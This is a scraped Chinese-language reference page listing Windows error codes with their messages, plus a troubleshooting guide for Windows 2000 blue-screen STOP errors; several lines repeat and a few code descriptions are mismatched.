1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
1019 0x03FB 系统无法配置系统登录记录所需的空间。
1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
1021 0x03FD 无法在临时机码下建立永久的子机码。
1022 0x03FE 变更要求的通知完成，但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案，找出变更的地方。
1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。
1052 0x041C 要求的控制对此服务无效
1053 0x041D The service did not respond to the start or control request in a timely fashion. 1054 0x041E 无法建立服务的执行绪。
1055 0x041F 服务数据库被锁定。
1056 0x0420 这种服务已经在执行。
1057 0x0421 帐户名称错误或者不存在。
1058 0x0422 指定的服务暂停作用，无法激活。
1059 0x0423 指定循环服务从属关系。
1060 0x0424 指定的服务不是安装进来的服务。
1061 0x0425 该服务项目此时无法接收控制讯息。
1062 0x0426 服务尚未激活。
1063 0x0427 无法联机到服务控制程序。
1064 0x0428 处理控制要求时，发生意外状况。
1065 0x0429 指定的数据库不存在。
1065 0x0429 指定的数据库不存在。
1066 0x042A 服务传回专属于服务的错误码。
1067 0x042B The process terminated unexpectedly.
1068 0x042C 从属服务或群组无法激活。
1069 0x042D 因为登入失败，所以没有激活服务。
1070 0x042E 在激活之后，服务在激活状态时当机。
1071 0x042F 指定服务数据库锁定无效。
1072 0x0430 指定的服务已经标示为删除。
1073 0x0431 指定的服务已经存在。
1074 0x0432 系统目前正以上一次执行成功的组态执行。
1075 0x0433 从属服务不存在，或已经标示为删除。
1076 0x0434 目前的激活已经接受上一次执行成功的 控制设定。
1077 0x0435 上一次激活之后，就没有再激活服务。
1078 0x0436 指定的名称已经用于服务名称或服务显示 名称。


Win2000蓝屏画面错误代码说明(4)

《一键清理系统垃圾》

Win2000蓝屏画面错误代码说明(4)

1100 0x044C 已经到了磁带的最后。
1101 0x044D 到了档案标示。
1102 0x044E 遇到磁带的开头或分割区。
1103 0x044F 到了档案组的结尾。
1104 0x0450 磁带没有任何资料。
1105 0x0451 磁带无法制作分割区。
1106 0x0452 存取多重容体的新磁带时，发现目前 区块大小错误。
1107 0x0453 加载磁带时，找不到磁带分割区信息。
1108 0x0454 无法锁住储存媒体退带功能。
1108 0x0454 无法锁住储存媒体退带功能。
1109 0x0455 无法解除加载储存媒体。
1110 0x0456 磁盘驱动器中的储存媒体已经变更。
1111 0x0457 已经重设 I/O 总线。
1112 0x0458 磁盘驱动器没有任何储存媒体。
1113 0x0459 目标 multi-byte code page，没有对应 Unicode 字符。
1114 0x045A 动态链接库 (DLL) 起始例程失败。
1115 0x045B 系统正在关机。
1116 0x045C 无法中止系统关机，因为没有关机的动作在进行中。
1117 0x045D 因为 I/O 装置发生错误，所以无法执行要求。
1118 0x045E 序列装置起始失败，会取消加载序列驱动程序。
1119 0x045F 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。 至少已经有一个使用同一IRQ 的其它装置已经开启。
1120 0x0460 A serial I/O operation was completed by another write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)
1121 0x0461 因为已经过了逾时时间，所以序列 I/O 作业完成。(IOCTL_SERIAL_XOFF_COUNTER 不是零。)
1122 0x0462 在磁盘找不到任何的 ID 地址标示。
1123 0x0463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。
1124 0x0464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。
1125 0x0465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。
1126 0x0466 存取硬盘失败，重试后也无法作业。
1127 0x0467 存取硬盘失败，重试后也无法作业。
1128 0x0468 存取硬盘时，必须重设磁盘控制卡，但是连重设的动作也失败。
1129 0x0469 到了磁带的最后。
1130 0x046A 可用服务器储存空间不足，无法处理这项指令。
1131 0x046B 发现潜在的死锁条件。
1132 0x046C 指定的基本地址或档案位移没有适当 对齐。
1140 0x0474 尝试变更系统电源状态，但其它的应用程序或驱动程序拒绝。
1141 0x0475 系统 BIOS 无法变更系统电源状态。
1150 0x047E 指定的程序需要新的 Windows 版本。
1151 0x047F 指定的程序不是 Windows 或 MS-DOS 程序。
1152 0x0480 指定的程序已经激活，无法再激活一次。
1153 0x0481 指定的程序是为旧版的 Windows 所写的。
1154 0x0482 执行此应用程序所需的链接库档案之一毁损。
1155 0x0483 没有应用程序与此项作业的指定档案建立关联。
1156 0x0484 传送指令到应用程序发生错误。
1157 0x0485 找不到执行此应用程序所需的链接库档案。
1200 0x04B0 指定的装置名称无效。
1201 0x04B1 装置现在虽然未联机，但是它是一个记忆联机。
1202 0x04B2 尝试记忆已经记住的装置。
1203 0x04B3 提供的网络路径找不到任何网络提供程序。
1203 0x04B3 提供的网络路径找不到任何网络提供程序。
1204 0x04B4 指定的网络提供程序名称错误。
1205 0x04B5 无法开启网络联机设定文件。
1206 0x04B6 网络联机设定文件坏掉。
1207 0x04B7 无法列举非容器。
1208 0x04B8 发生延伸的错误。
1209 0x04B9 指定的群组名称错误。
1210 0x04BA 指定的计算机名称错误。
1211 0x04BB 指定的事件名称错误。
1212 0x04BC 指定的网络名称错误。
1213 0x04BD 指定的服务名称错误。
1214 0x04BE 指定的网络名称错误。
1215 0x04BF 指定的资源共享名称错误。
1216 0x04C0 指定的密码错误。
1217 0x04C1 指定的讯息名称错误。
1218 0x04C2 指定的讯息目的地错误。
1219 0x04C3 所提供的条件与现有的条件组发生冲突。
1220 0x04C4 尝试与网络服务器联机，但是 与该服务器的联机已经太多。
1221 0x04C5 其它网络计算机已经在使用这个工作群组或网域名称。
1222 0x04C6 网络没有显示出来或者没有激活。
1223 0x04C7 使用者已经取消作业。
1224 0x04C8 要求的作业无法在已经开启使用者对应区段的档案执行。
1225 0x04C9 远程系统拒绝网络联机。
1225 0x04C9 远程系统拒绝网络联机。
1226 0x04CA 关闭网络联机。
1227 0x04CB 网络传输端点已经有相关连的地址。
1228 0x04CC 地址尚未有相关的网络端点。
1229 0x04CD 尝试在不存在的网络连线作业。
1230 0x04CE 在作用中的网络联机上执行无效的作业。
1231 0x04CF 无法传输到远程网络。
1232 0x04D0 无法联机到远程系统。
1233 0x04D1 远程系统不支持传输通讯协议。
1234 0x04D2 远程系统的目的地网络端点没有作何执行中的服务。
1235 0x04D3 要求已经中止。
1236 0x04D4 进端系统已经中断网络联机。
1237 0x04D5 无法完成作业，请重试。
1238 0x04D6 无法与服务器联机，原因是这个帐户已经到达同时联机数目的上限。
1239 0x04D7 尝试在这个帐户未授权的时间登入网络。
1240 0x04D8 这个帐户无法从这个地方登入网络。
1241 0x04D9 网络地址无法用于这个要求的作业。
1242 0x04DA 服务已经登记。
1243 0x04DB 指定的服务不存在。
1244 0x04DC 作业无法执行，原因是使用者尚未授权使用。
1245 0x04DD 要求的作业无法执行，原因是使用者尚未登入网络。 指定的服务不存在。
1246 0x04DE 传回要求呼叫者继续工作的讯息。
1247 0x04DF 在完成起始作业之后，尝试再执行起始作业。
1248 0x04E0 没有其它的近端装置。


Win2000蓝屏画面错误代码说明(5)

《一键清理系统垃圾》

Win2000蓝屏画面错误代码说明(5)

1300 0x0514 并未指定所有的参照权限给呼叫者。
1301 0x0515 帐户名称与安全识别码之间尚有未执行完成的联机。
1302 0x0516 此帐户并未设定特别的系统配额限制。
1303 0x0517 没有可用的加密机码。传回一个已知的加密机码。
1304 0x0518 NT 密码太复杂，无法转换成 LAN Manager 密码。传回的LAN Manager密码是一个空字符串。
1305 0x0519 修正层次不详。
1306 0x051A 表示两个修订阶层不兼容。
1307 0x051B 此安全识别码无法指定为这个对象的拥有者。
1308 0x051C 此安全识别码无法指定为主要的对象群组。
1309 0x051D An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client.
1310 0x051E 不可以关闭群组。
1311 0x051F 目前没有可登入的服务器，所以无法处理登入要求。
1312 0x0520 指定登入作业阶段不存在。该作业阶段可能已经 结束。
1313 0x0521 指定的权限不存在。
1313 0x0521 指定的权限不存在。
1314 0x0522 客户端未列出要求的权限。
1315 0x0523 所提供的名称格式与帐户名称不符。
1316 0x0524 指定的使用者已经存在。
1317 0x0525 指定的使用者不存在。
1318 0x0526 指定的群组已经存在。
1319 0x0527 指定的群组不存存。
1320 0x0528 指定的使用者帐户已经是指定群组的成员，或 指定的群组因为内含成员而无法删除。
1321 0x0529 指定的使用者帐户不是指定的群组帐户成员。
1322 0x052A 上一次留下来的管理帐户无法关闭或 删除。
1323 0x052B 无法更新密码。所输入的密码不正确。
1324 0x052C 无法更新密码。所输入的新密码内含不符合 密码规定。
1325 0x052D 因为违反密码更新规则，所以无法更新密码。
1326 0x052E 登入失败: 无法辨识的使用者名称或密码错误。
1327 0x052F 登入失败: 使用者帐户限制。
1328 0x0530 登入失败: 违反帐户登入时间限制。
1329 0x0531 登入失败: 使用者不可登入这部计算机。
1330 0x0532 登入失败: 指定的帐户密码过期。
1331 0x0533 登入失败: 帐户目前无效。
1332 0x0534 帐户名称与帐户识别码不符。
1333 0x0535 一次要求太多的近端使用者识别码 (local user identifiers，LUIDs)。
1333 0x0535 一次要求太多的近端使用者识别码 (local user identifiers，LUIDs)。
1334 0x0536 没有可用的近端使用者识别码 (local user identifiers ，LUIDs)。
1335 0x0537 安全识别码的转授权部份对这个特殊用法无效。
1336 0x0538 无效的存取控制清单结构。
1337 0x0539 安全识别码结构无效。
1338 0x053A 安全叙述子结构无效。
1340 0x053C 无法建立继承的存取控制清单或存取控件目。
1341 0x053D 服务器目前无效。
1342 0x053E 服务器目前可以使用。
1343 0x053F 所提供的值是无效的识别码授权值。
1344 0x0540 没有可供安全信息更新使用的内存。
1345 0x0541 指定的属性无效，或指定的属性与整个群组的 属性不兼容。
1346 0x0542 Either a required impersonation level was not provided, or the provided impersonation level is invalid.
1347 0x0543 Cannot open an anonymous level security token.
1348 0x0544 所要求的认可信息类别无效。
1349 0x0545 The type of the token is inappropriate for its attempted use.
1350 0x0546 无法在没有相关连安全性的对象执行 安全作业。
1351 0x0547 指示无法连到 Windows NT 服务器，或网域中的对象 受到保护，所以无法撷取所需的对象。
1351 0x0547 指示无法连到 Windows NT 服务器，或网域中的对象 受到保护，所以无法撷取所需的对象。
1352 0x0548 安全帐户管理程序或区域安全授权服务器状态 不正确，所以无法执行安全作业。
1353 0x0549 网域状态错误，所以无法执行安全作业。
1354 0x054A 只有网域的主域控制器才能使用这项作业。
1355 0x054B 指定的网域不存在。
1356 0x054C 指定的网域已经存在。
1357 0x054D 尝试超过每个服务器的网域数目限制。
1358 0x054E 因为磁盘上发生严重的储存媒体错误或是数据结构毁损， 所以无法完成所要求的作业。
1359 0x054F 安全帐户数据库内有内部不一致的状况。
1360 0x0550 通用的存取类型包含在某一存取屏蔽中， 这个屏蔽已经对应到非通用的类型。
1361 0x0551 安全叙述子的格式不正确 (absolute or self-relative)。
1362 0x0552 所要求的动作只能给登入使用。
1363 0x0553 无法利用已经在使用的识别码来激活新的作业阶段。
1363 0x0553 无法利用已经在使用的识别码来激活新的作业阶段。
1364 0x0554 无法识别指定的确认包装。
1365 0x0555 登入作业阶段不是在与要求的作业一致的 状态。
1366 0x0556 登入作业阶段识别码已经在使用中。
1367 0x0557 登入要求包含无效的登入类型值。
1368 0x0558 Unable to impersonate via a named pipe until data has been read from that pipe.
1369 0x0559 The transaction state of a Registry subtree is incompatible with the requested operation.
1370 0x055A 内部安全数据库毁损。
1371 0x055B 无法在内建帐户执行这项作业。
1372 0x055C 无法在这个内建的特殊群组执行这项操作。
1373 0x055D 无法在这个内建的特殊使用者执行这项作业。
1374 0x055E 因为群组目前是使用者的主要群组，所以不能 从群组移除使用者。
1375 0x055F The token is already in use as a primary token.
1376 0x0560 指定的区域群组不存在。
1377 0x0561 指定的帐户名称不是区域群组的成员。
1378 0x0562 指定的帐户名称已经是区域群组的成员。
1379 0x0563 指定的区域群组已经存在。
1380 0x0564 登入失败：使用者无权在这部计算机以要求的 登入类型登入。
1381 0x0565 The maximum number of secrets that may be stored in a single system has been exceeded.
1381 0x0565 The maximum number of secrets that may be stored in a single system has been exceeded.
1382 0x0566 The length of a secret exceeds the maximum length allowed.
1383 0x0567 本区安全性授权数据库内含的资料不一致。
1384 0x0568 在登入时，使用者的安全内容累积太多的 安全识别码。
1385 0x0569 登入失败: 使用者尚未被许可在这个台脑使用要求的登入类型。
1386 0x056A 交叉加密的密码需要变更使用者的密码。
1387 0x056B 因为成员不存在，所以无法将新的成员新增到 区域群组。
1388 0x056C 因为成员的帐号类型不正确，所以无法新增到区域群组。
1389 0x056D 指定的安全 ID 太多。
1390 0x056E 需要用到交互加密的密码才能变更这个使用者的密码。
1391 0x056F 表示存取控制清单没有可继承的组件
1392 0x0570 档案或目录已毁，无法读取资料。
1393 0x0571 磁盘结构已毁无法读取。
1394 0x0572 没有指定之登入作业阶段的使用者作业阶段机码。
1395 0x0573 正在存取的服务仅授权特定数目的联机。 而目前联机数目已达上限，所以无法再建立服务联机。


Win2000蓝屏画面错误代码说明(6)

《一键清理系统垃圾》

Win2000蓝屏画面错误代码说明(6)

1400 0x0578 窗口代码无效。
1401 0x0579 菜单识别码无效。
1402 0x057A 光标句柄无效。
1403 0x057B 加速键表格句柄无效。
1403 0x057B 加速键表格句柄无效。
1404 0x057C Invalid hook handle. 1405 0x057D 无效的多重窗口位置结构控制。
1406 0x057E 无法建立最上层的子窗口。
1407 0x057F 找不到 window class。
1408 0x0580 无效的窗口，属于其它的执行绪。
1409 0x0581 快速键已经登记。
1410 0x0582 Class 已经存在。
1411 0x0583 Class 不存在。
1412 0x0584 Class 仍然有开启的窗口。
1413 0x0585 无效的索引。
1414 0x0586 图标句柄无效。
1415 0x0587 使用专用的 DIALOG 窗口文字。
1416 0x0588 清单方块识别码找不到。
1417 0x0589 找不到任何通配字符。
1418 0x058A 执行绪 (thread) 没有开启剪贴簿。
1419 0x058B 快速键没有登记。
1420 0x058C 不是有效的对话窗口。
1421 0x058D Control ID 找不到。
1422 0x058E 清单方块的讯息无效，因为没有任何的编辑句柄。
1423 0x058F 窗口不是一个清单方块。
1424 0x0590 高度必须小于 256。
1425 0x0591 装置范围 (DC) 句柄无效。
1425 0x0591 装置范围 (DC) 句柄无效。
1426 0x0592 锁定程序类型无效。
1427 0x0593 锁定程序无效。
1428 0x0594 没有模块句柄就不能设定非本区的锁定。
1429 0x0595 This hook procedure can only be set globally.
1430 0x0596 The journal hook procedure is already installed.
1431 0x0597 The hook procedure is not installed.
1432 0x0598 无效的单一选择清单方块讯息。
1433 0x0599 LB_SETCOUNT 传送到 non-lazy 清单方块。
1434 0x059A 这个清单方块不支持跳格停驻。
1435 0x059B 不可毁损由其它执行绪所建立的对象。
1436 0x059C 子窗口不能有菜单。
1437 0x059D 窗口没有系统菜单。
1438 0x059E 无效的消息框样式。
1439 0x059F 无效的 system-wide (SPI_*) 参数。
1440 0x05A0 屏幕已经锁定。
1441 0x05A1 All handles to windows in a multiple-window position structure must have the same parent.
1442 0x05A2 窗口不是子窗口。
1443 0x05A3 GW_* 指令无效。
1444 0x05A4 执行绪识别码无效。
1445 0x05A5 无法处理多重文件接口窗口的讯息。
1445 0x05A5 无法处理多重文件接口窗口的讯息。
1446 0x05A6 即现式菜单已在作用中。
1447 0x05A7 窗口没有滚动条。
1448 0x05A8 滚动条范围不可以大于 0x7FFF。 1449 0x05A9 无法以指定的方式显示或移除窗口。
1450 0x05AA 系统资源不足，无法完成所要求的服务。
1451 0x05AB 系统资源不足，无法完成所要求的服务。
1452 0x05AC 系统资源不足，无法完成所要求的服务。
1453 0x05AD 配额不足，无法完成所要求的服务。
1454 0x05AE 配额不足，无法完成所要求的服务。
1455 0x05AF 这项作业的 paging 文件太小，无法完成作业。
1456 0x05B0 找不到菜单项目。
1500 0x05DC 事件记录文件坏掉。
1501 0x05DD 无法开启事件记录文件，因此事件记录服务没有激活。
1502 0x05DE 事件记录文件已满。
1503 0x05DF 事件记录文件已经变更。
1700 0x06A4 字符串连结错误。
1701 0x06A5 连结句柄 (binding handle) 的类型错误。
1702 0x06A6 连结句柄 (binding handle) 无效。
1703 0x06A7 不支持 RPC 通讯协议顺序。
1704 0x06A8 RPC 通讯协议顺序无效。
1705 0x06A9 字符串 universal unique identifier (UUID) 无效。
1705 0x06A9 字符串 universal unique identifier (UUID) 无效。
1706 0x06AA 端点格式错误。
1707 0x06AB 网络地址无效。
1708 0x06AC 找不到端点。
1709 0x06AD 逾时数值无效。
1710 0x06AE 找不到对象的 universal unique identifier (UUID)。
1711 0x06AF 对象的 universal unique identifier (UUID) 已经登记。
1712 0x06B0 类型的 universal unique identifier (UUID) 已经登记。
1713 0x06B1 RPC 服务器已经在听候。
1714 0x06B2 没有登记通讯协议顺序。
1715 0x06B3 RPC 服务器没有听候指令。
1716 0x06B4 管理员类型不详。
1717 0x06B5 接口不详。
1718 0x06B6 没有联机。
1719 0x06B7 没有通讯协议顺序。
1720 0x06B8 无法建立端点。
1721 0x06B9 资源不足，无法完成作业。
1722 0x06BA RPC 服务器无法使用。
1723 0x06BB RPC 服务器太忙，无法完成这项作业。
1724 0x06BC 网络选项无效。
1725 0x06BD 这个执行绪 (thread) 没有任何执行的远程过程调用。
1726 0x06BE 远程过程调用失败。
1727 0x06BF 远程过程调用失败，所以没有执行。
1727 0x06BF 远程过程调用失败，所以没有执行。
1728 0x06C0 远程过程调用 (remote procedure call，RPC) 通讯协议发生错误。
1730 0x06C2 RPC 服务器不支持转送语法。
1732 0x06C4 不支持 universal unique identifier (UUID) 的类型。
1733 0x06C5 封签 (tag) 无效。
1734 0x06C6 数组无效。
1735 0x06C7 连结中没有项目名称。
1736 0x06C8 名称语法无效。
1737 0x06C9 名称语法不被支持。
1739 0x06CB 没有任何网络地址可以用来建立全球唯一的识别码 (UUID)。
1740 0x06CC 端点重复。
1741 0x06CD 授权类型不详。
1742 0x06CE 呼叫次数的上限太小。
1743 0x06CF 字符串太长。
1744 0x06D0 找不到 RPC 通讯协议顺序。
1745 0x06D1 程序号码超出范围。
1746 0x06D2 连结中没有包含任何确认信息。
1747 0x06D3 确认服务不详。
1748 0x06D4 确认层次不详。
1749 0x06D5 安全内容无效。
1750 0x06D6 确认服务不详。
1751 0x06D7 项目无效。
1751 0x06D7 项目无效。
1752 0x06D8 服务器端点无法执行这个作业。
1753 0x06D9 端点对应程序没有其它的端点。
1754 0x06DA 没有汇出任何的接口。
1755 0x06DB 项目名称不完整。
1756 0x06DC 版本选项无效。
1757 0x06DD 没有其它的成员。
1758 0x06DE 没有任何资料可以取消汇出。
1759 0x06DF 接口找不到。
1760 0x06E0 项目已经存在。
1761 0x06E1 项目找不到。
1762 0x06E2 名称服务无法使用。
1763 0x06E3 网络地址系列无效。
1764 0x06E4 要求的作业不受支持。
1765 0x06E5 没有可用来仿真的安全内容。
1766 0x06E6 远程过程调用 (RPC) 发生内部错误。
1767 0x06E7 RPC 服务器尝试用整数除以 0。
1768 0x06E8 RPC 服务器发生地址设定错误。
1769 0x06E9 RPC 服务器的浮点作业导致除以 0 的运算。
1770 0x06EA RPC 服务器发生浮点 underflow。
1771 0x06EB RPC 服务器发生浮点 overflow。
1772 0x06EC 清单中可供连结自动代码 的 RPC 服务器已经用完。
1773 0x06ED 无法开启字符转换表档案。
1773 0x06ED 无法开启字符转换表档案。
1774 0x06EE 包含字符转换表的档案少于 512 字节。
1775 0x06EF 在远程过程调用时，将空的 context 代码从 客户端传送到主计算机。
1777 0x06F1 在远程过程调用时内容处理改变。
1778 0x06F2 传送给远程过程调用的连结代码不符。
1779 0x06F3 The stub is unable to get the remote procedure call handle.
1780 0x06F4 A null reference pointer was passed to the stub.
1781 0x06F5 The enumeration value is out of range.
1782 0x06F6 字节计数太小。


Win2000蓝屏画面错误代码说明(7)

《一键清理系统垃圾》

Win2000蓝屏画面错误代码说明(7)

1783 0x06F7 The stub received bad data.
1784 0x06F8 所提供的使用者缓冲区对要求的作业无效。
1785 0x06F9 无法辨识磁盘储存媒体。磁盘储存媒体可能还没有制作格式。
1786 0x06FA The workstation does not have a trust secret.
1787 0x06FB The SAM database on the Windows NT Server does not have a computer account for this workstation trust relationship.
1788 0x06FC The trust relationship between the primary domain and the trusted domain failed.
1789 0x06FD The trust relationship between this workstation and theprimary domain failed.
1790 0x06FE 网络登入失败。
1790 0x06FE 网络登入失败。
1791 0x06FF 远程过程调用已经在这个执行绪进行中。
1792 0x0700 尝试登入，但网络登入服务尚未激活。
1793 0x0701 使用者的帐户已经过期。
1794 0x0702 The redirector is in use and cannot be unloaded.
1795 0x0703 指定的打印机驱动程序已经安装。
1796 0x0704 指定的连接埠无法识别。
1797 0x0705 打印机驱动程序无法识别。
1798 0x0706 打印处理器不详。
1799 0x0707 指定的分隔档无效。
1800 0x0708 指定的优先级无效。
1801 0x0709 打印机名称无效。
1802 0x070A 打印机已经存在。
1803 0x070B 打印机指令无效。
1804 0x070C 指定的数据类型无效。
1805 0x070D 指定的 Environment 无效。
1806 0x070E 没有其它的连结。
1807 0x070F 这是一个跨网域的信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。
1808 0x0710 这是一个计算机帐户。请使用您的全域性使用者帐户或区域性使用者帐户来存取这个服务器。
1809 0x0711 这是一个伺服端信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。
1810 0x0712 指定的网域名称或安全识别码与网域信用信息 不符。
1811 0x0713 服务器正在使用中，无法卸载。
1812 0x0714 指定的影像档案没有有包含资源区段。
1813 0x0715 在影像文件找不到指定的资源类型。
1814 0x0716 在影像文件找不到指定的资源名称。
1815 0x0717 在影像文件找不到指定的资源语系识别码。
1816 0x0718 可用的配额不足，无法处理这项指令。
1817 0x0719 登录任何接口。
1818 0x071A 处理这项呼叫的时候，服务器发生变更。
1819 0x071B 连结代码没有包含所有必须的信息。
1820 0x071C 通讯失败。
1821 0x071D 要求的认证层次不被支持。
1822 0x071E 没有登记任何主要的名称。
1823 0x071F 指定的错误不是有效的 Windows RPC 错误码。
1824 0x0720 A UUID that is valid only on this computer has been allocated.
1825 0x0721 发生安全包装指定错误。
1826 0x0722 没有取消执行绪 (THREAD)
1827 0x0723 针对编码/译码的代码进行无效的作业。
1828 0x0724 Incompatible version of the serializing package.
1829 0x0725 不兼容的 RPC stub 版本。
1898 0x076A 找不到群组成员。
1899 0x076B 无法建立 endpoint mapper 数据库。
1900 0x076C The object universal unique identifier (UUID) is the nil UUID.
1901 0x076D 指定的项目无效。
1902 0x076E 指定窗体名称错误。
1903 0x076F 指定的窗体大小错误。
1904 0x0770 指定的打印机句柄已经在等候。
1905 0x0771 指定的打印机已经删除
1906 0x0772 打印机的状态错误。
1907 0x0773 使用者在第一次登入之前，必须先变更它的密码。
1908 0x0774 找不到这个网域的域控制器。
1909 0x0775 参照的帐户目前被锁定，无法登入。
2000 0x07D0 像素格式无效。
2001 0x07D1 指定的驱动程序无效。
2002 0x07D2 窗口样式或 class 属性对这项作业无效。
2003 0x07D3 不支持所要求的中继文件作业。
2004 0x07D4 不支持要求的传输作业。
2005 0x07D5 不支持要求的剪辑作业。
2005 0x07D5 不支持要求的剪辑作业。
2202 0x089A 指定的使用者名称无效。
2250 0x08CA 网络联机不存在。
2401 0x0961 这个网络联机已经开启档案或者要求暂停。
2402 0x0962 现行的联机仍然存在。
2404 0x0964 装置正在使用中，无法中断联机。
3000 0x0BB8 指定的打印机监视器不详。
3001 0x0BB9 指定的打印机驱动程序正在使用中。
3002 0x0BBA 找不到排存盘。
3003 0x0BBB 没有发出 StartDocPrinter 呼叫。
3004 0x0BBC 没有发出 AddJob 呼叫。
3005 0x0BBD 指定的打印处理器已经安装。
3006 0x0BBE 指定打印监控程序已经安装。
4000 0x0FA0 在处理指令时，WINS 发生错误。
4001 0x0FA1 无法删除区域的 WINS。
4002 0x0FA2 The importation from the file failed.
4003 0x0FA3 制作备份失败。以前执行过完整的备份吗？
4004 0x0FA4 无法制作备份，请检查目录。
4005 0x0FA5 名称不在 WINS 数据库中。
4006 0x0FA6 不可用未设定的打印机来取代。
6118 0x17E6 这个工作群组的服务清单目前无法使用。


Windows2000蓝屏死机故障处理

《一键清理系统垃圾》

Windows2000蓝屏死机故障处理

    从理论上讲，纯32位的Windows 2000是不会出现死机的，但是这仅仅是理论上。病毒或硬件和硬件驱动程序不匹配等原因将造成Windows2000的崩溃，当Windows 2000出现死机时，显示器屏幕将变为蓝色，然后出现STOP故障提示信息。下面我们分别介绍通用的STOP故障处理方法和特殊的STOP故障排除。

通用STOP故障处理
    1.首先使用新版杀毒软件检查计算机上是否有病毒。
    2.如果Windows 2000可以启动，请检查“事件查看器”中的信息，以确定导致故障的设备或驱动程序。启动“事件查看器”的方法是：“开始”\“设置”\“控制面板”\“管理工具”\“事件查看器”\“系统日志”。
    3.如果不能启动计算机，试着用“安全模式”或“最后一次正确的配置”启动计算机，然后删除或禁用新安装的附加程序或驱动程序。如果用“安全模式”启动不了计算机，可使用修复控制台。修复控制台可以禁用一些服务、重新命名设备驱动程序、检修引导扇区或主引导记录。
    4.拆下新安装的硬件设备（RAM、适配卡、硬盘、调制解调器等等）。
    5.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    6.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    7.检查Microsoft兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows2000兼容。Hcl.txt在Windows 2000 CD-ROM的\Support文件夹中。
    8.在BIOS中禁用内存缓存功能。
    9.重新启动计算机，在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。(注:使用“最后一次正确的配置”的方式启动计算机，计算机的所有设置被重置为最后一次成功启动时的配置。)
    10.如果能够访问Web，请进入http://www.micr-osoft.com/ntserver/，单击“Support”/“Search
Knowledge Base”，在“Type your keywords here”处，输入“stop”和相应的号码（如出现STOP消息“stop:0x0000000A”，可在此输入“stop0x0000000A”），按Enter键，就可以找出所出现的STOP问题的解决方法。

特殊排除

STOP消息 0x0000000A故障（设备已经安装）
通常原因 驱动程序使用了不正常的内存地址。
    1.如果Windows 2000还可以启动，检查“事件查看器”中显示的信息，确定引起问题的设备或驱动程序。
    2.关掉或禁用一些新安装的驱动程序，并删除新安装的附加程序。
    3.拆下一些新安装的硬件（RAM、适配器、硬盘、调制解调器等等）。
    4.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    5.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    6.检查Microsoft兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows2000兼容。
    7.在BIOS中禁用内存缓存功能。
    8.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

STOP消息 0x0000000A故障(刚加入新设备时)
通常原因 驱动程序使用了不正常的内存地址。
    1.在安装过程中，屏幕上提示“安装程序正在检查计算机硬件配置”时，按F5,根据提示选择合适的计算机类型。例如，如果计算机是单处理器，请选择“标准PC”。
    2.在BIOS中禁用内存缓存功能。
    3.拆下所有适配卡，并断开所有不是启动计算机所必需的硬件设备，再重新安装Windows2000。
    4.如果系统配有SCSI适配卡，请向适配卡销售商索取最新的Windows2000驱动程序，禁用同步协商功能，检查终结头和设备的SCSI ID号。
    5.如果系统配有IDE设备，设IDE端口为Primary。检查IDE设备的Master/Slave/Only设置。除了硬盘，拆下其它所有的IDE设备。
    6.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    7.检查Microsoft兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows2000兼容。
    8.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

STOP消息 0x0000001E故障
    1.检查是否有充分的磁盘空间，尤其是新安装。
    2.禁用STOP消息中显示的驱动程序和所有新安装的驱动程序。
    3.如果所使用的视频驱动程序不是Microsoft提供的，试着切换到标准VGA驱动程序或者由Windows2000支持的合适的驱动程序。
    4.确保系统有最新的BIOS。
    5.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

STOP消息 0x00000023和0x00000024故障
通常原因 严重的驱动器碎片、超载的文件I/O、第三方的驱动器镜像软件或者一些防病毒软件出错。
    1.禁用一些防病毒软件或者备份程序，禁用所有碎片整理应用程序。
    2.运行CHKDSK /f 检修硬盘驱动器，然后重新启动计算机。
    3.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

STOP消息 0x0000002E故障
通常原因 系统内存中的奇偶校验错误。
    1.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    2.在BIOS中禁用内存缓存功能。
    3.试着用“安全模式”启动。如果“安全模式”可启动计算机，试着更改为标准VGA驱动程序。如果这不能解决问题，可能须要用另外的视频适配卡。“兼容硬件列表”中列出了兼容的视频适配卡。
    4.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    5.拆下一些新安装的硬件（RAM、适配器、硬盘、调制解调器等等）。
    6.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

STOP消息 0x0000003F故障
通常原因 驱动程序没有被完全清除。
    1.删除一些新安装的软件，包括备份工具或磁盘工具，例如碎片整理和防病毒软件。

STOP消息 0x00000058故障
通常原因 在容错集的主驱动器中发生错误。
    1.用Windows 2000引导软盘，从镜像（第二个）系统驱动器启动计算机。
    2.重新启动计算机。在启动屏幕处，按F8进入“高级启动选项”，然后选择“最后一次正确的配置”。

STOP消息 0x0000007B故障
通常原因 在I/O系统的初始化过程中出现问题（通常是引导驱动器或文件系统）。
    1.检查计算机上是否有病毒。这个STOP消息通常在引导扇区有病毒时出现。
    2.使用“修复控制台”来修复驱动器。
    3.拆下新安装的硬盘驱动器或控制卡。
